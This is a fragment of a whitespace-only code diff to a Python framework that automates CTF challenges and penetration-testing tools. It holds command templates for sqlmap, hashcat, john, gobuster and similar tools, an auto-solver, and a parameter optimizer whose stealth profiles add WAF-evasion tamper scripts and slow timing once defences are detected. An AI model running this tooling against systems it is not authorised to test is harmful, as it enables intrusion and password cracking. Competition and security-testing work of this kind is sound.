"Submit the flag", "parallel": False, "tools": ["manual"], "estimated_time": 300} ]) - + def _identify_parallel_tasks(self, category: str) -> List[Dict[str, Any]]: """Identify tasks that can be executed in parallel for efficiency""" parallel_tasks = { @@ -3334,9 +3334,9 @@ class CTFWorkflowManager: {"task_group": "format_analysis", "tasks": ["file", "binwalk"], "max_concurrent": 2} ] } - + return parallel_tasks.get(category, []) - + def _calculate_resource_requirements(self, challenge: CTFChallenge) -> Dict[str, Any]: """Calculate estimated resource requirements for challenge""" base_requirements = { @@ -3347,7 +3347,7 @@ class CTFWorkflowManager: "gpu_required": False, "special_tools": [] } - + # Adjust based on category category_adjustments = { "web": {"cpu_cores": 4, "memory_mb": 4096, "network_bandwidth": "high"}, @@ -3358,10 +3358,10 @@ class CTFWorkflowManager: "osint": {"cpu_cores": 2, "memory_mb": 2048, "network_bandwidth": "high"}, "misc": {"cpu_cores": 2, "memory_mb": 2048} } - + if challenge.category in category_adjustments: base_requirements.update(category_adjustments[challenge.category]) - + # Adjust based on difficulty difficulty_multipliers = { "easy": 1.0, @@ -3370,14 +3370,14 @@ class CTFWorkflowManager: "insane": 2.0, "unknown": 1.3 } - + multiplier = difficulty_multipliers[challenge.difficulty] base_requirements["cpu_cores"] = int(base_requirements["cpu_cores"] * multiplier) base_requirements["memory_mb"] = int(base_requirements["memory_mb"] * multiplier) base_requirements["disk_space_mb"] = int(base_requirements["disk_space_mb"] * multiplier) - + return base_requirements - + def _predict_expected_artifacts(self, challenge: CTFChallenge) -> List[Dict[str, str]]: """Predict expected artifacts and outputs from challenge solving""" artifacts = { @@ -3431,12 +3431,12 @@ class CTFWorkflowManager: {"type": "intermediate_results", "description": "Intermediate calculation results"} ] } - + return artifacts.get(challenge.category, [ {"type": "solution_data", "description": "Solution-related data"}, {"type": "analysis_results", "description": "Analysis results and findings"} ]) - + def _create_validation_steps(self, category: str) -> List[Dict[str, str]]: """Create validation steps to verify solution correctness""" validation_steps = { @@ -3483,7 +3483,7 @@ class CTFWorkflowManager: {"step": "flag_extraction", "description": "Extract and validate final flag"} ] } - + return validation_steps.get(category, [ {"step": "general_validation", "description": "General solution validation"}, {"step": "flag_verification", "description": "Verify flag format and correctness"} @@ -3491,7 +3491,7 @@ class CTFWorkflowManager: class CTFToolManager: """Advanced tool manager for CTF challenges with comprehensive tool arsenal""" - + def __init__(self): self.tool_commands = { # Web Application Security Tools @@ -3507,7 +3507,7 @@ class CTFToolManager: "wpscan": "wpscan --url {} --enumerate ap,at,cb,dbe", "nikto": "nikto -h {} -C all", "whatweb": "whatweb -v -a 3", - + # Cryptography Challenge Tools "hashcat": "hashcat -m 0 -a 0 --potfile-disable --quiet", "john": "john --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-MD5", @@ -3528,7 +3528,7 @@ class CTFToolManager: "base32": "base32 -d", "hex": "xxd -r -p", "rot13": "tr 'A-Za-z' 'N-ZA-Mn-za-m'", - + # Binary Exploitation (Pwn) Tools "checksec": "checksec --file", "pwntools": "python3 -c 'from pwn import *; context.log_level = \"debug\"'", @@ -3553,7 +3553,7 @@ class CTFToolManager: "hexdump": "hexdump -C", "pwninit": "pwninit", "libc-database": "python3 /opt/libc-database/find.py", - + # Forensics Investigation Tools "binwalk": "binwalk -e --dd='.*'", "foremost": "foremost -i {} -o /tmp/foremost_output", @@ -3577,7 +3577,7 @@ class CTFToolManager: "bulk-extractor": "bulk_extractor -o /tmp/bulk_output", "ddrescue": "ddrescue", "dc3dd": "dc3dd", - + # Reverse Engineering Tools "ida": "ida64", "ida-free": "ida64 -A", @@ -3596,7 +3596,7 @@ class CTFToolManager: "dnspy": "dnspy", "ilspy": "ilspy", "dotpeek": "dotpeek", - + # OSINT and Reconnaissance Tools "sherlock": "sherlock", "social-analyzer": "social-analyzer", @@ -3619,7 +3619,7 @@ class CTFToolManager: "waybackurls": "waybackurls", "gau": "gau", "httpx-osint": "httpx -title -tech-detect -status-code", - + # Miscellaneous Challenge Tools "qr-decoder": "zbarimg", "barcode-decoder": "zbarimg", @@ -3640,7 +3640,7 @@ class CTFToolManager: "xz": "unxz", "lzma": "unlzma", "compress": "uncompress", - + # Modern Web Technologies "jwt-tool": "python3 /opt/jwt_tool/jwt_tool.py", "jwt-cracker": "jwt-cracker", @@ -3650,7 +3650,7 @@ class CTFToolManager: "burpsuite": "java -jar /opt/burpsuite/burpsuite.jar", "owasp-zap": "zap.sh -cmd", "websocket-king": "python3 /opt/websocket-king/ws_test.py", - + # Cloud and Container Security "docker": "docker", "kubectl": "kubectl", @@ -3659,7 +3659,7 @@ class CTFToolManager: "gcloud": "gcloud", "terraform": "terraform", "ansible": "ansible", - + # Mobile Application Security "adb": "adb", "frida": "frida", @@ -3668,7 +3668,7 @@ class CTFToolManager: "apkleaks": "apkleaks -f", "qark": "qark --apk" } - + # Tool categories for intelligent selection self.tool_categories = { "web_recon": ["httpx", "katana", "waybackurls", "gau", "whatweb"], @@ -3697,11 +3697,11 @@ class CTFToolManager: "misc_compression": ["zip", "7zip", "rar", "tar"], "misc_esoteric": ["brainfuck", "whitespace", "piet", "malbolge"] } - + def get_tool_command(self, tool: str, target: str, additional_args: str = "") -> str: """Get optimized command for CTF tool with intelligent parameter selection""" base_command = self.tool_commands.get(tool, tool) - + # Add intelligent parameter optimization based on tool type if tool in ["hashcat", "john"]: # For hash cracking, add common wordlists and rules @@ -3709,14 +3709,14 @@ class CTFToolManager: base_command += " --wordlist=/usr/share/wordlists/rockyou.txt" if tool == "hashcat" and "--rules" not in base_command: base_command += " --rules-file=/usr/share/hashcat/rules/best64.rule" - + elif tool in ["sqlmap"]: # For SQL injection, add tamper scripts and optimization if "--tamper" not in base_command: base_command += " --tamper=space2comment,charencode,randomcase" if "--threads" not in base_command: base_command += " --threads=5" - + elif tool in ["gobuster", "dirsearch", "feroxbuster"]: # For directory brute forcing, optimize threads and extensions if tool == "gobuster" and "-t" not in base_command: @@ -3725,25 +3725,25 @@ class CTFToolManager: base_command += " -t 50" elif tool == "feroxbuster" and "-t" not in base_command: base_command += " -t 50" - + if additional_args: return f"{base_command} {additional_args} {target}" else: return f"{base_command} {target}" - + def get_category_tools(self, category: str) -> List[str]: """Get all tools for a specific category""" return self.tool_categories.get(category, []) - + def suggest_tools_for_challenge(self, challenge_description: str, category: str) -> List[str]: """Suggest optimal tools based on challenge description and category""" suggested_tools = [] description_lower = challenge_description.lower() - + # Category-based tool suggestions if category == "web": suggested_tools.extend(self.tool_categories["web_recon"][:2]) - + if any(keyword in description_lower for keyword in ["sql", "injection", "database", "mysql", "postgres"]): suggested_tools.extend(["sqlmap", "hash-identifier"]) if any(keyword in description_lower for keyword in ["xss", "script", "javascript", "dom"]): @@ -3758,7 +3758,7 @@ class CTFToolManager: suggested_tools.append("jwt-tool") if any(keyword in description_lower for keyword in ["graphql", "api"]): suggested_tools.append("graphql-voyager") - + elif category == "crypto": if any(keyword in description_lower for keyword in ["hash", "md5", "sha", "password"]): suggested_tools.extend(["hashcat", "john", "hash-identifier"]) @@ -3774,10 +3774,10 @@ class CTFToolManager: suggested_tools.append("rot13") if any(keyword in description_lower for keyword in ["pgp", "gpg", "signature"]): suggested_tools.append("gpg") - + elif category == "pwn": suggested_tools.extend(["checksec", "file", "strings"]) - + if any(keyword in description_lower for keyword in ["buffer", "overflow", "bof"]): suggested_tools.extend(["pwntools", "gdb-peda", "ropper"]) if any(keyword in description_lower for keyword in ["format", "printf", "string"]): @@ -3790,7 +3790,7 @@ class CTFToolManager: suggested_tools.extend(["pwntools", "one-gadget"]) if any(keyword in description_lower for keyword in ["canary", "stack", "protection"]): suggested_tools.extend(["checksec", "pwntools"]) - + elif category == "forensics": if any(keyword in description_lower for keyword in ["image", "jpg", "png", "gif", "steganography"]): suggested_tools.extend(["exiftool", "steghide", "stegsolve", "zsteg"]) @@ -3804,10 +3804,10 @@ class CTFToolManager: suggested_tools.extend(["testdisk", "sleuthkit"]) if any(keyword in description_lower for keyword in ["audio", "wav", "mp3", "sound"]): suggested_tools.extend(["audacity", "sonic-visualizer"]) - + elif category == "rev": suggested_tools.extend(["file", "strings", "objdump"]) - + if any(keyword in description_lower for keyword in ["packed", "upx", "packer"]): suggested_tools.extend(["upx", "peid", "detect-it-easy"]) if any(keyword in description_lower for keyword in ["android", "apk", "mobile"]): @@ -3820,7 +3820,7 @@ class CTFToolManager: suggested_tools.extend(["ghidra", "ida", "x64dbg"]) if any(keyword in description_lower for keyword in ["linux", "elf", "binary"]): suggested_tools.extend(["ghidra", "radare2", "gdb-peda"]) - + elif category == "osint": if any(keyword in description_lower for keyword in ["username", "social", "media"]): suggested_tools.extend(["sherlock", "social-analyzer"]) @@ -3832,7 +3832,7 @@ class CTFToolManager: suggested_tools.extend(["shodan", "censys"]) if any(keyword in description_lower for keyword in ["whois", "registration", "owner"]): suggested_tools.append("whois") - + elif category == "misc": if any(keyword in description_lower for keyword in ["qr", "barcode", "code"]): suggested_tools.append("qr-decoder") @@ -3844,7 +3844,7 @@ class CTFToolManager: suggested_tools.append("whitespace") if any(keyword in description_lower for keyword in ["piet", "image", "program"]): suggested_tools.append("piet") - + # Remove duplicates while preserving order return list(dict.fromkeys(suggested_tools)) @@ -3854,13 +3854,13 @@ class CTFToolManager: class CTFChallengeAutomator: """Advanced automation system for CTF challenge solving""" - + def __init__(self): self.active_challenges = {} self.solution_cache = {} self.learning_database = {} self.success_patterns = {} - + def auto_solve_challenge(self, challenge: CTFChallenge) -> Dict[str, Any]: """Attempt to automatically solve a CTF challenge""" result = { @@ -3874,48 +3874,48 @@ class CTFChallengeAutomator: "flag_candidates": [], "next_actions": [] } - + try: # Create workflow workflow = ctf_manager.create_ctf_challenge_workflow(challenge) - + # Execute automated steps for step in workflow["workflow_steps"]: if step.get("parallel", False): step_result = self._execute_parallel_step(step, challenge) else: step_result = self._execute_sequential_step(step, challenge) - + result["automated_steps"].append(step_result) - + # Check for flag candidates flag_candidates = self._extract_flag_candidates(step_result.get("output", "")) result["flag_candidates"].extend(flag_candidates) - + # Update confidence based on step success if step_result.get("success", False): result["confidence"] += 0.1 - + # Early termination if flag found if flag_candidates and self._validate_flag_format(flag_candidates[0]): result["status"] = "solved" result["flag"] = flag_candidates[0] break - + # If not solved automatically, provide manual guidance if result["status"] != "solved": result["manual_steps"] = self._generate_manual_guidance(challenge, result) result["status"] = "needs_manual_intervention" - + result["confidence"] = min(1.0, result["confidence"]) - + except Exception as e: result["status"] = "error" result["error"] = str(e) logger.error(f"Error in auto-solve for {challenge.name}: {str(e)}") - + return result - + def _execute_parallel_step(self, step: Dict[str, Any], challenge: CTFChallenge) -> Dict[str, Any]: """Execute a step with parallel tool execution""" step_result = { @@ -3927,10 +3927,10 @@ class CTFChallengeAutomator: "execution_time": 0, "artifacts": [] } - + start_time = time.time() tools = step.get("tools", []) - + # Execute tools in parallel (simulated for now) for tool in tools: try: @@ -3942,10 +3942,10 @@ class CTFChallengeAutomator: step_result["success"] = True except Exception as e: step_result["output"] += f"[{tool}] Error: {str(e)}\n" - + step_result["execution_time"] = time.time() - start_time return step_result - + def _execute_sequential_step(self, step: Dict[str, Any], challenge: CTFChallenge) -> Dict[str, Any]: """Execute a step sequentially""" step_result = { @@ -3957,10 +3957,10 @@ class CTFChallengeAutomator: "execution_time": 0, "artifacts": [] } - + start_time = time.time() tools = step.get("tools", []) - + for tool in tools: try: if tool == "manual": @@ -3976,10 +3976,10 @@ class CTFChallengeAutomator: step_result["success"] = True except Exception as e: step_result["output"] += f"[{tool}] Error: {str(e)}\n" - + step_result["execution_time"] = time.time() - start_time return step_result - + def _extract_flag_candidates(self, output: str) -> List[str]: """Extract potential flags from tool output""" flag_patterns = [ @@ -3992,14 +3992,14 @@ class CTFChallengeAutomator: r'[0-9a-f]{40}', # SHA1 hash r'[0-9a-f]{64}' # SHA256 hash ] - + candidates = [] for pattern in flag_patterns: matches = re.findall(pattern, output, re.IGNORECASE) candidates.extend(matches) - + return list(set(candidates)) # Remove duplicates - + def _validate_flag_format(self, flag: str) -> bool: """Validate if a string matches common flag formats""" common_formats = [ @@ -4009,32 +4009,32 @@ class CTFChallengeAutomator: r'^CTF\{.+\}$', r'^[a-zA-Z0-9_]+\{.+\}$' ] - + for pattern in common_formats: if re.match(pattern, flag, re.IGNORECASE): return True - + return False - + def _generate_manual_guidance(self, challenge: CTFChallenge, current_result: Dict[str, Any]) -> List[Dict[str, str]]: """Generate manual guidance when automation fails""" guidance = [] - + # Analyze what was attempted attempted_tools = [] for step in current_result["automated_steps"]: attempted_tools.extend(step.get("tools_used", [])) - + # Suggest alternative approaches all_category_tools = ctf_tools.get_category_tools(f"{challenge.category}_recon") unused_tools = [tool for tool in all_category_tools if tool not in attempted_tools] - + if unused_tools: guidance.append({ "action": "try_alternative_tools", "description": f"Try these alternative tools: {', '.join(unused_tools[:3])}" }) - + # Category-specific guidance if challenge.category == "web": guidance.extend([ @@ -4066,18 +4066,18 @@ class CTFChallengeAutomator: {"action": "key_extraction", "description": "Extract hardcoded keys or important values"}, {"action": "dynamic_analysis", "description": "Use dynamic analysis to understand runtime behavior"} ]) - + return guidance class CTFTeamCoordinator: """Coordinate team efforts in CTF competitions""" - + def __init__(self): self.team_members = {} self.challenge_assignments = {} self.team_communication = [] self.shared_resources = {} - + def optimize_team_strategy(self, challenges: List[CTFChallenge], team_skills: Dict[str, List[str]]) -> Dict[str, Any]: """Optimize team strategy based on member skills and challenge types""" strategy = { @@ -4088,7 +4088,7 @@ class CTFTeamCoordinator: "estimated_total_score": 0, "time_allocation": {} } - + # Analyze team skills skill_matrix = {} for member, skills in team_skills.items(): @@ -4101,19 +4101,19 @@ class CTFTeamCoordinator: "osint": "osint" in skills or "intelligence" in skills, "misc": True # Everyone can handle misc } - + # Score challenges for each team member member_challenge_scores = {} for member in team_skills.keys(): member_challenge_scores[member] = [] - + for challenge in challenges: base_score = challenge.points skill_multiplier = 1.0 - + if skill_matrix[member].get(challenge.category, False): skill_multiplier = 1.5 # 50% bonus for skill match - + difficulty_penalty = { "easy": 1.0, "medium": 0.9, @@ -4121,19 +4121,19 @@ class CTFTeamCoordinator: "insane": 0.5, "unknown": 0.8 }[challenge.difficulty] - + final_score = base_score * skill_multiplier * difficulty_penalty - + member_challenge_scores[member].append({ "challenge": challenge, "score": final_score, "estimated_time": self._estimate_solve_time(challenge, skill_matrix[member]) }) - + # Assign challenges using Hungarian algorithm approximation assignments = self._assign_challenges_optimally(member_challenge_scores) strategy["assignments"] = assignments - + # Create priority queue all_assignments = [] for member, challenges in assignments.items(): @@ -4144,14 +4144,14 @@ class CTFTeamCoordinator: "priority": challenge_info["score"], "estimated_time": challenge_info["estimated_time"] }) - + strategy["priority_queue"] = sorted(all_assignments, key=lambda x: x["priority"], reverse=True) - + # Identify collaboration opportunities strategy["collaboration_opportunities"] = self._identify_collaboration_opportunities(challenges, team_skills) - + return strategy - + def _estimate_solve_time(self, challenge: CTFChallenge, member_skills: Dict[str, bool]) -> int: """Estimate solve time for a challenge based on member skills""" base_times = { @@ -4161,25 +4161,25 @@ class CTFTeamCoordinator: "insane": 14400, # 4 hours "unknown": 5400 # 1.5 hours } - + base_time = base_times[challenge.difficulty] - + # Skill bonus if member_skills.get(challenge.category, False): base_time = int(base_time * 0.7) # 30% faster with relevant skills - + return base_time - + def _assign_challenges_optimally(self, member_challenge_scores: Dict[str, List[Dict]]) -> Dict[str, List[Dict]]: """Assign challenges to team members optimally""" assignments = {member: [] for member in member_challenge_scores.keys()} assigned_challenges = set() - + # Simple greedy assignment (in practice, would use Hungarian algorithm) for _ in range(len(member_challenge_scores)): best_assignment = None best_score = -1 - + for member, challenge_scores in member_challenge_scores.items(): for challenge_info in challenge_scores: challenge_name = challenge_info["challenge"].name @@ -4187,18 +4187,18 @@ class CTFTeamCoordinator: if challenge_info["score"] > best_score: best_score = challenge_info["score"] best_assignment = (member, challenge_info) - + if best_assignment: member, challenge_info = best_assignment assignments[member].append(challenge_info) assigned_challenges.add(challenge_info["challenge"].name) - + return assignments - + def _identify_collaboration_opportunities(self, challenges: List[CTFChallenge], team_skills: Dict[str, List[str]]) -> List[Dict[str, Any]]: """Identify challenges that would benefit from team collaboration""" collaboration_opportunities = [] - + for challenge in challenges: if challenge.difficulty in ["hard", "insane"]: # High-difficulty challenges benefit from collaboration @@ -4206,14 +4206,14 @@ class CTFTeamCoordinator: for member, skills in team_skills.items(): if challenge.category in [skill.lower() for skill in skills]: relevant_members.append(member) - + if len(relevant_members) >= 2: collaboration_opportunities.append({ "challenge": challenge.name, "recommended_team": relevant_members, "reason": f"High-difficulty {challenge.category} challenge benefits from collaboration" }) - + return collaboration_opportunities # ============================================================================ @@ -4222,7 +4222,7 @@ class CTFTeamCoordinator: class TechnologyDetector: """Advanced technology detection system for context-aware parameter selection""" - + def __init__(self): self.detection_patterns = { "web_servers": { @@ -4275,10 +4275,10 @@ class TechnologyDetector: "cdn": ["CloudFront", "Fastly", "KeyCDN", "MaxCDN", "Cloudflare"] } } - + self.port_services = { 21: "ftp", - 22: "ssh", + 22: "ssh", 23: "telnet", 25: "smtp", 53: "dns", @@ -4298,7 +4298,7 @@ class TechnologyDetector: 9200: "elasticsearch", 11211: "memcached" } - + def detect_technologies(self, target: str, headers: Dict[str, str] = None, content: str = "", ports: List[int] = None) -> Dict[str, List[str]]: """Comprehensive technology detection""" detected = { @@ -4310,7 +4310,7 @@ class TechnologyDetector: "security": [], "services": [] } - + # Header-based detection if headers: for category, tech_patterns in self.detection_patterns.items(): @@ -4320,7 +4320,7 @@ class TechnologyDetector: if pattern.lower() in header_value.lower() or pattern.lower() in header_name.lower(): if tech not in detected[category]: detected[category].append(tech) - + # Content-based detection if content: content_lower = content.lower() @@ -4330,7 +4330,7 @@ class TechnologyDetector: if pattern.lower() in content_lower: if tech not in detected[category]: detected[category].append(tech) - + # Port-based service detection if ports: for port in ports: @@ -4338,12 +4338,12 @@ class TechnologyDetector: service = self.port_services[port] if service not in detected["services"]: detected["services"].append(service) - + return detected class RateLimitDetector: """Intelligent rate limiting detection and automatic timing adjustment""" - + def __init__(self): self.rate_limit_indicators = [ "rate limit", @@ -4356,26 +4356,26 @@ class RateLimitDetector: "api limit", "request limit" ] - + self.timing_profiles = { "aggressive": {"delay": 0.1, "threads": 50, "timeout": 5}, "normal": {"delay": 0.5, "threads": 20, "timeout": 10}, "conservative": {"delay": 1.0, "threads": 10, "timeout": 15}, "stealth": {"delay": 2.0, "threads": 5, "timeout": 30} } - + def detect_rate_limiting(self, response_text: str, status_code: int, headers: Dict[str, str] = None) -> Dict[str, Any]: """Detect rate limiting from response""" rate_limit_detected = False confidence = 0.0 indicators_found = [] - + # Status code check if status_code == 429: rate_limit_detected = True confidence += 0.8 indicators_found.append("HTTP 429 status") - + # Response text check response_lower = response_text.lower() for indicator in self.rate_limit_indicators: @@ -4383,7 +4383,7 @@ class RateLimitDetector: rate_limit_detected = True confidence += 0.2 indicators_found.append(f"Text: '{indicator}'") - + # Header check if headers: rate_limit_headers = ["x-ratelimit", "retry-after", "x-rate-limit"] @@ -4393,16 +4393,16 @@ class RateLimitDetector: rate_limit_detected = True confidence += 0.3 indicators_found.append(f"Header: {header_name}") - + confidence = min(1.0, confidence) - + return { "detected": rate_limit_detected, "confidence": confidence, "indicators": indicators_found, "recommended_profile": self._recommend_timing_profile(confidence) } - + def _recommend_timing_profile(self, confidence: float) -> str: """Recommend timing profile based on rate limit confidence""" if confidence >= 0.8: @@ -4413,13 +4413,13 @@ class RateLimitDetector: return "normal" else: return "aggressive" - + def adjust_timing(self, current_params: Dict[str, Any], profile: str) -> Dict[str, Any]: """Adjust timing parameters based on profile""" timing = self.timing_profiles.get(profile, self.timing_profiles["normal"]) - + adjusted_params = current_params.copy() - + # Adjust common parameters if "threads" in adjusted_params: adjusted_params["threads"] = timing["threads"] @@ -4427,28 +4427,28 @@ class RateLimitDetector: adjusted_params["delay"] = timing["delay"] if "timeout" in adjusted_params: adjusted_params["timeout"] = timing["timeout"] - + # Tool-specific adjustments if "additional_args" in adjusted_params: args = adjusted_params["additional_args"] - + # Remove existing timing arguments args = re.sub(r'-t\s+\d+', '', args) args = re.sub(r'--threads\s+\d+', '', args) args = re.sub(r'--delay\s+[\d.]+', '', args) - + # Add new timing arguments args += f" -t {timing['threads']}" if timing["delay"] > 0: args += f" --delay {timing['delay']}" - + adjusted_params["additional_args"] = args.strip() - + return adjusted_params class FailureRecoverySystem: """Intelligent failure recovery with alternative tool selection""" - + def __init__(self): self.tool_alternatives = { "nmap": ["rustscan", "masscan", "zmap"], @@ -4460,7 +4460,7 @@ class FailureRecoverySystem: "amass": ["subfinder", "sublist3r", "assetfinder"], "ffuf": ["wfuzz", "gobuster", "dirb"] } - + self.failure_patterns = { "timeout": ["timeout", "timed out", "connection timeout"], "permission_denied": ["permission denied", "access denied", "forbidden"], @@ -4469,15 +4469,15 @@ class FailureRecoverySystem: "rate_limited": ["rate limit", "too many requests", "throttled"], "authentication_required": ["authentication required", "unauthorized", "login required"] } - + def analyze_failure(self, error_output: str, exit_code: int) -> Dict[str, Any]: """Analyze failure and suggest recovery strategies""" failure_type = "unknown" confidence = 0.0 recovery_strategies = [] - + error_lower = error_output.lower() - + # Identify failure type for failure, patterns in self.failure_patterns.items(): for pattern in patterns: @@ -4485,7 +4485,7 @@ class FailureRecoverySystem: failure_type = failure confidence += 0.3 break - + # Exit code analysis if exit_code == 1: confidence += 0.1 @@ -4495,9 +4495,9 @@ class FailureRecoverySystem: elif exit_code == 126: # permission denied failure_type = "permission_denied" confidence += 0.5 - + confidence = min(1.0, confidence) - + # Generate recovery strategies if failure_type == "timeout": recovery_strategies = [ @@ -4526,14 +4526,14 @@ class FailureRecoverySystem: "Use proxy or VPN", "Verify target is accessible" ] - + return { "failure_type": failure_type, "confidence": confidence, "recovery_strategies": recovery_strategies, "alternative_tools": self.tool_alternatives.get(self._extract_tool_name(error_output), []) } - + def _extract_tool_name(self, error_output: str) -> str: """Extract tool name from error output""" for tool in self.tool_alternatives.keys(): @@ -4543,7 +4543,7 @@ class FailureRecoverySystem: class PerformanceMonitor: """Advanced performance monitoring with automatic resource allocation""" - + def __init__(self): self.performance_metrics = {} self.resource_thresholds = { @@ -4552,7 +4552,7 @@ class PerformanceMonitor: "disk_high": 90.0, "network_high": 80.0 } - + self.optimization_rules = { "high_cpu": { "reduce_threads": 0.5, @@ -4575,7 +4575,7 @@ class PerformanceMonitor: "enable_connection_pooling": True } } - + def monitor_system_resources(self) -> Dict[str, float]: """Monitor current system resource usage""" try: @@ -4583,7 +4583,7 @@ class PerformanceMonitor: memory = psutil.virtual_memory() disk = psutil.disk_usage('/') network = psutil.net_io_counters() - + return { "cpu_percent": cpu_percent, "memory_percent": memory.percent, @@ -4595,31 +4595,31 @@ class PerformanceMonitor: except Exception as e: logger.error(f"Error monitoring system resources: {str(e)}") return {} - + def optimize_based_on_resources(self, current_params: Dict[str, Any], resource_usage: Dict[str, float]) -> Dict[str, Any]: """Optimize parameters based on current resource usage""" optimized_params = current_params.copy() optimizations_applied = [] - + # CPU optimization if resource_usage.get("cpu_percent", 0) > self.resource_thresholds["cpu_high"]: if "threads" in optimized_params: original_threads = optimized_params["threads"] optimized_params["threads"] = max(1, int(original_threads * self.optimization_rules["high_cpu"]["reduce_threads"])) optimizations_applied.append(f"Reduced threads from {original_threads} to {optimized_params['threads']}") - + if "delay" in optimized_params: original_delay = optimized_params.get("delay", 0) optimized_params["delay"] = original_delay * self.optimization_rules["high_cpu"]["increase_delay"] optimizations_applied.append(f"Increased delay to {optimized_params['delay']}") - + # Memory optimization if resource_usage.get("memory_percent", 0) > self.resource_thresholds["memory_high"]: if "batch_size" in optimized_params: original_batch = optimized_params["batch_size"] optimized_params["batch_size"] = max(1, int(original_batch * self.optimization_rules["high_memory"]["reduce_batch_size"])) optimizations_applied.append(f"Reduced batch size from {original_batch} to {optimized_params['batch_size']}") - + # Network optimization if "network_bytes_sent" in resource_usage: # Simple heuristic for high network usage @@ -4628,19 +4628,19 @@ class PerformanceMonitor: original_conn = optimized_params["concurrent_connections"] optimized_params["concurrent_connections"] = max(1, int(original_conn * self.optimization_rules["high_network"]["reduce_concurrent_connections"])) optimizations_applied.append(f"Reduced concurrent connections to {optimized_params['concurrent_connections']}") - + optimized_params["_optimizations_applied"] = optimizations_applied return optimized_params class ParameterOptimizer: """Advanced parameter optimization system with intelligent context-aware selection""" - + def __init__(self): self.tech_detector = TechnologyDetector() self.rate_limiter = RateLimitDetector() self.failure_recovery = FailureRecoverySystem() self.performance_monitor = PerformanceMonitor() - + # Tool-specific optimization profiles self.optimization_profiles = { "nmap": { @@ -4698,15 +4698,15 @@ class ParameterOptimizer: } } } - + def optimize_parameters_advanced(self, tool: str, target_profile: TargetProfile, context: Dict[str, Any] = None) -> Dict[str, Any]: """Advanced parameter optimization with full intelligence""" if context is None: context = {} - + # Get base parameters base_params = self._get_base_parameters(tool, target_profile) - + # Detect technologies for context-aware optimization detected_tech = self.tech_detector.detect_technologies( target_profile.target, @@ -4714,18 +4714,18 @@ class ParameterOptimizer: content=context.get("content", ""), ports=target_profile.open_ports ) - + # Apply technology-specific optimizations tech_optimized_params = self._apply_technology_optimizations(tool, base_params, detected_tech) - + # Monitor system resources and optimize accordingly resource_usage = self.performance_monitor.monitor_system_resources() resource_optimized_params = self.performance_monitor.optimize_based_on_resources(tech_optimized_params, resource_usage) - + # Apply profile-based optimizations profile = context.get("optimization_profile", "normal") profile_optimized_params = self._apply_profile_optimizations(tool, resource_optimized_params, profile) - + # Add metadata profile_optimized_params["_optimization_metadata"] = { "detected_technologies": detected_tech, @@ -4734,13 +4734,13 @@ class ParameterOptimizer: "optimizations_applied": resource_optimized_params.get("_optimizations_applied", []), "timestamp": datetime.now().isoformat() } - + return profile_optimized_params - + def _get_base_parameters(self, tool: str, profile: TargetProfile) -> Dict[str, Any]: """Get base parameters for a tool""" base_params = {"target": profile.target} - + # Tool-specific base parameters if tool == "nmap": base_params.update({ @@ -4765,26 +4765,26 @@ class ParameterOptimizer: "severity": "critical,high,medium", "threads": 25 }) - + return base_params - + def _apply_technology_optimizations(self, tool: str, params: Dict[str, Any], detected_tech: Dict[str, List[str]]) -> Dict[str, Any]: """Apply technology-specific optimizations""" optimized_params = params.copy() - + # Web server optimizations if "apache" in detected_tech.get("web_servers", []): if tool == "gobuster": optimized_params["extensions"] = "php,html,txt,xml,conf" elif tool == "nuclei": optimized_params["tags"] = optimized_params.get("tags", "") + ",apache" - + elif "nginx" in detected_tech.get("web_servers", []): if tool == "gobuster": optimized_params["extensions"] = "php,html,txt,json,conf" elif tool == "nuclei": optimized_params["tags"] = optimized_params.get("tags", "") + ",nginx" - + # CMS optimizations if "wordpress" in detected_tech.get("cms", []): if tool == "gobuster": @@ -4794,20 +4794,20 @@ class ParameterOptimizer: optimized_params["tags"] = optimized_params.get("tags", "") + ",wordpress" elif tool == "wpscan": optimized_params["enumerate"] = "ap,at,cb,dbe" - + # Language-specific optimizations if "php" in detected_tech.get("languages", []): if tool == "gobuster": optimized_params["extensions"] = "php,php3,php4,php5,phtml,html" elif tool == "sqlmap": optimized_params["dbms"] = "mysql" - + elif "dotnet" in detected_tech.get("languages", []): if tool == "gobuster": optimized_params["extensions"] = "aspx,asp,html,txt" elif tool == "sqlmap": optimized_params["dbms"] = "mssql" - + # Security feature adaptations if detected_tech.get("security", []): # WAF detected - use stealth mode @@ -4819,34 +4819,34 @@ class ParameterOptimizer: elif tool == "sqlmap": optimized_params["delay"] = 2 optimized_params["randomize"] = True - + return optimized_params - + def _apply_profile_optimizations(self, tool: str, params: Dict[str, Any], profile: str) -> Dict[str, Any]: """Apply optimization profile settings""" if tool not in self.optimization_profiles: return params - + profile_settings = self.optimization_profiles[tool].get(profile, {}) optimized_params = params.copy() - + # Apply profile-specific settings for key, value in profile_settings.items(): optimized_params[key] = value - + # Handle stealth mode flag if params.get("_stealth_mode", False) and profile != "stealth": # Force stealth settings even if different profile requested stealth_settings = self.optimization_profiles[tool].get("stealth", {}) for key, value in stealth_settings.items(): optimized_params[key] = value - + return optimized_params - + def handle_tool_failure(self, tool: str, error_output: str, exit_code: int, current_params: Dict[str, Any]) -> Dict[str, Any]: """Handle tool failure and suggest recovery""" failure_analysis = self.failure_recovery.analyze_failure(error_output, exit_code) - + recovery_plan = { "original_tool": tool, "failure_analysis": failure_analysis, @@ -4854,7 +4854,7 @@ class ParameterOptimizer: "alternative_tools": failure_analysis["alternative_tools"], "adjusted_parameters": current_params.copy() } - + # Apply automatic parameter adjustments based on failure type if failure_analysis["failure_type"] == "timeout": if "timeout" in recovery_plan["adjusted_parameters"]: @@ -4862,12 +4862,12 @@ class ParameterOptimizer: if "threads" in recovery_plan["adjusted_parameters"]: recovery_plan["adjusted_parameters"]["threads"] = max(1, recovery_plan["adjusted_parameters"]["threads"] // 2) recovery_plan["recovery_actions"].append("Increased timeout and reduced threads") - + elif failure_analysis["failure_type"] == "rate_limited": timing_profile = self.rate_limiter.adjust_timing(recovery_plan["adjusted_parameters"], "stealth") recovery_plan["adjusted_parameters"].update(timing_profile) recovery_plan["recovery_actions"].append("Applied stealth timing profile") - + return recovery_plan # ============================================================================ @@ -4876,7 +4876,7 @@ class ParameterOptimizer: class ProcessPool: """Intelligent process pool with auto-scaling capabilities""" - + def __init__(self, min_workers=2, max_workers=20, scale_threshold=0.8): self.min_workers = min_workers self.max_workers = max_workers @@ -4893,14 +4893,14 @@ class ProcessPool: "cpu_usage": 0.0, "memory_usage": 0.0 } - + # Initialize minimum workers self._scale_up(self.min_workers) - + # Start monitoring thread self.monitor_thread = threading.Thread(target=self._monitor_performance, daemon=True) self.monitor_thread.start() - + def 